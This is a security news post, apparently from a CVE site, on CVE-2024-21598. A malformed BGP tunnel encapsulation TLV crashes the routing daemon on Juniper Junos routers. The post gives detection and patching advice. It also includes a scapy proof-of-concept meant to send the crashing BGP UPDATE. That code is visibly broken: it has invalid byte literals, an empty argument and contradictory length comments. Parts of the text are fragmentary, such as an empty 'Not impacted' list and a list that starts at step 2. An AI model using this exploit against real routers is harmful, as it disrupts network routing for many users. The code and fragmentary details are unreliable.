CVE CyberSecurity Database News

CVE-2024-21598 - Crashing Juniper Routers over BGP with a Malformed Tunnel TLV

Poster -

Juniper Networks recently disclosed CVE-2024-21598, a critical vulnerability affecting their Junos OS and Junos OS Evolved systems. This post covers everything you need to know—including the affected systems, how the bug works, reference links, a code snippet used for testing the exploit, and what this means from the attacker's and defender’s perspectives.

In Plain English: What’s the Problem?

The problem is an Improper Validation of Syntactic Correctness of Input. In practical terms, if a Juniper device running an affected version of Junos receives a BGP update message containing a intentionally malformed tunnel encapsulation attribute (a specific type of optional BGP attribute), the Routing Protocol Daemon (rpd) crashes and restarts. This can be triggered remotely, without any authentication, across an established BGP session.

The upshot: an attacker can remotely and repeatedly crash vulnerable Juniper routers, causing Denial of Service (DoS). In ISPs and enterprise backbones, this can mean routing disruptions, possible route flaps, and degraded network performance.

23.2-EVO: earlier than 23.2R1-S2-EVO, 23.2R2-EVO

Not impacted:

The Root Cause

BGP extensions (such as tunnel encapsulation) let routers exchange information about encapsulations like MPLS or VXLAN tunnels. These attributes are encoded as TLVs (Type-Length-Value). If a TLV is sent with incorrect syntax (for example, a length field that doesn’t match the payload, or illegal values in a field), Juniper’s rpd process does not safely handle this, resulting in a crash.

Attacker maintains an established BGP session (direct or via a route server, e.g., in IXPs).

2. Attacker sends a BGP UPDATE with a tunnel encapsulation attribute containing a maliciously crafted TLV.

Exploit Code Example

Below, you’ll see a proof-of-concept using Python and scapy to craft a BGP UPDATE containing a malformed tunnel encapsulation attribute. This is for instructional/research use only—do not attack networks without permission!

from scapy.all import *
from scapy.contrib.bgp import *

# Replace with correct source/destination IPs and AS numbers
src_ip = '1.2.3.4'
dst_ip = '5.6.7.8'

my_asn = 65001
peer_asn = 65002

# Build a malformed tunnel encapsulation attribute (TLV)
# e.g., correct type (24), incorrect length (set to 255, value too short)
malformed_tunnel_attr = bytes([
    x18, # Attribute type (24 = tunnel encapsulation)
    x10, # Attribute flags (optional, transitive)
    x01, # Attribute length (should be 1 byte, but value missing or too long/short)
    xFF, # Malformed length value
    # No value or too short on purpose
])

# Or use BGPPathAttrGeneric for custom attributes
bgp_update = BGPUpdate(
    withdrawn_routes_len=,
    total_path_attr_len=len(malformed_tunnel_attr),
    path_attributes=[BGPPathAttrGeneric(attr=malformed_tunnel_attr)],
    nlri=[]
)

bgp_pkt = IP(src=src_ip, dst=dst_ip)/TCP(sport=179, dport=179, flags='PA')/bgp_update

send(bgp_pkt)

*Note: You must have a live BGP session and understand BGP protocol mechanics for this to work.*

Monitor syslog or rpd logs for repeated crashes (look for signals like: rpd[xxxx]: crash ...).

- BGP session resets and route flap alarms on NOC dashboards may also indicate possible exploitation.

Mitigation

- Patch immediately: See official Juniper security advisory for fixed versions.

BGP sessions are often long-lived and not rigorously policed in IXPs and transit relationships.

- Once attacked, routing state is lost (rpd resets), causing route flap, instability, and possible BGP route withdrawals.

References and Further Reading

- Official Juniper Security Advisory JSA79096 (CVE-2024-21598)
- Tunnel Encapsulation Attribute RFC 9012
- BGP Path Attributes and TLVs

Final Thoughts

CVE-2024-21598 is a textbook example of why input validation in networking software matters—a single malformed BGP attribute can crash the core process of an Internet backbone router. If you manage Juniper routers, patch now, audit your BGP neighbors, and get ready for further advisories like this. If you are a researcher or Red Team, this shows how much power a single malformed packet can have in the right context.

Timeline

Published on: 04/12/2024 15:15:23 UTC
Last modified on: 05/16/2024 20:15:08 UTC